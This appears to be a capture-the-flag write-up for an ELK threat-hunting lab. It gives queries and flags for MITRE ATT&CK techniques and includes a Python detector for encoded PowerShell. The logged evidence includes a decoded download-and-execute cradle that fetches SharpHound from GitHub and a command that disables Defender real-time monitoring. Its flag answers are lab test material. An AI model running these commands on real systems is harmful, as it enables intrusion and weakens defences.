
Phase 3 ELK

Reconnaissance

Q1

In the ELK dashboard, search for evidence of MITRE ATT&CK ID T1059.001 - specifically for encoded PowerShell commands. What is the flag listed in the command?

Query: powershell.exe AND EncodedCommand

Encoded command in the matching event:
SUVYIChOZXctT2JqZWN0IE5ldC5XZWJjbGllbnQpLkRvd25sb2FkU3RyaW5nKCdodHRwczovL3Jhdy5naXRodWJ1c2VyY29udGVudC5jb20vQmxvb2RIb3VuZEFEL0Jsb29kSG91bmQvODA0NTAzOTYyYjZkYzU1NGFkN2QzMjRjZmE3ZjJiNGE1NjZhMTRlMi9Jbmdlc3RvcnMvU2hhcnBIb3VuZC5wczEnKTsgZWNobyAiVFRQX0ZMQUd7NWNhZGRlYTVkNTI3YzYxZDM1Nzg1OTRhZGQyYWQ5ZmZ9Ig==

Decoded:
IEX (New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/80450396b2b6dc554ad7d324cfa7f2b4a566a14e2/Ingestors/SharpHound.ps1'); echo "TTP_FLAG{5caddea5d527c61d3578594add2ad9ff}"

Answer:

TTP_FLAG{5caddea5d527c61d3578594add2ad9ff}
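As an added worked example (not part of this writeup), a small Python scanner that does the second half of Q1 offline: it picks the -EncodedCommand argument out of process command lines, decodes it, and pulls out any TTP_FLAG value. Note the caveat it handles: real PowerShell expects the argument as base64 of UTF-16LE text, but the blob in the lab event above is plain base64 of ASCII, so the decoder tries UTF-16LE first and falls back to UTF-8. The log lines are constructed sample data; the first reuses the blob shown above.

```python
import base64
import re

# Constructed sample log lines (not taken from the ELK instance). The first reuses the
# base64 blob from the Q1 event; the second is encoded the way PowerShell's own
# -EncodedCommand expects (UTF-16LE), so both decoding paths are exercised.
SAMPLE_LOGS = [
    "powershell.exe -EncodedCommand "
    "SUVYIChOZXctT2JqZWN0IE5ldC5XZWJjbGllbnQpLkRvd25sb2FkU3RyaW5nKCdodHRwczovL3Jhdy5n"
    "aXRodWJ1c2VyY29udGVudC5jb20vQmxvb2RIb3VuZEFEL0Jsb29kSG91bmQvODA0NTAzOTYyYjZkYzU1"
    "NGFkN2QzMjRjZmE3ZjJiNGE1NjZhMTRlMi9Jbmdlc3RvcnMvU2hhcnBIb3VuZC5wczEnKTsgZWNobyAi"
    "VFRQX0ZMQUd7NWNhZGRlYTVkNTI3YzYxZDM1Nzg1OTRhZGQyYWQ5ZmZ9Ig==",
    "powershell.exe -nop -w hidden -enc "
    + base64.b64encode('Write-Output "TTP_FLAG{constructed-sample}"'.encode("utf-16le")).decode(),
    "notepad.exe C:\\Users\\analyst\\notes.txt",
]

# -EncodedCommand and its accepted abbreviations, followed by the base64 argument.
ENC_RE = re.compile(r"-(?:e|ec|enc|encoded|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
FLAG_RE = re.compile(r"TTP_FLAG\{[^}]*\}")


def decode_encoded_command(b64: str) -> str:
    """Decode an -EncodedCommand argument, preferring UTF-16LE (what PowerShell uses)."""
    raw = base64.b64decode(b64, validate=True)
    if len(raw) % 2 == 0:
        text = raw.decode("utf-16le", errors="replace")
        # Genuine UTF-16LE of an ASCII script decodes to printable ASCII; if it does
        # not, the blob was plain base64 of UTF-8/ASCII text (as in the Q1 event).
        if text.isascii() and all(c.isprintable() or c in "\r\n\t" for c in text):
            return text
    return raw.decode("utf-8", errors="replace")


def find_encoded_commands(log_lines):
    """Return (decoded_command, flags_found) for each PowerShell line with an encoded command."""
    hits = []
    for line in log_lines:
        if "powershell" not in line.lower():
            continue
        match = ENC_RE.search(line)
        if match is None:
            continue
        try:
            decoded = decode_encoded_command(match.group(1))
        except ValueError:  # binascii.Error is a ValueError: argument was not valid base64
            continue
        hits.append((decoded, FLAG_RE.findall(decoded)))
    return hits
```

Calling find_encoded_commands(SAMPLE_LOGS) returns two hits; the first decodes to the IEX download cradle above with the Q1 flag, and the notepad line is ignored.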

Q2

In the ELK dashboard, identify evidence related to MITRE ATT&CK technique T1547.001. During your investigation, you will find a hexadecimal string used as a flag. What is the value of that string? Include only the hexadecimal string.

Query: (event.code:13 OR event.code:12) AND "CurrentVersion\\Run"

Matching registry value:
HKU\\S-1-5-21-3688751335-3073641799-161370460-500\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\FL@G: a8f5f167f44f4964e6c998dee827110c

Answer:

a8f5f167f44f4964e6c998dee827110c

Q3

What is the name of the file associated with MITRE ATT&CK ID T1218.005? (filename only)

Answer:

mshta.exe

Q4

In the 'actions on objectives' stage of their attack, the attacker is attempting to use methods indicated in MITRE ATT&CK ID T1003.002. Find evidence of this in the logs, and enter the flag. (Flag will show in the logs as a filename)

Query: dump

Answer:

FFFLAAAAG-a3dcb4d229de6fde0db5686dee47145d.dmp

Q5

In preparation for the installation phase of their attack, the attacker makes use of MITRE ATT&CK ID T1562.001 to disable built-in Windows Defender. What is the flag shown for that indicator? (Only include the portion of the flag within the brackets {}, do not include the brackets themselves)

Query: DisableRealtimeMonitoring

Matching command line:
powershell.exe -Command Set-MpPreference -DisableRealtimeMonitoring True # FL @ G {525118d8317f54222985e09a922bad86}

Answer:

525118d8317f54222985e09a922bad86
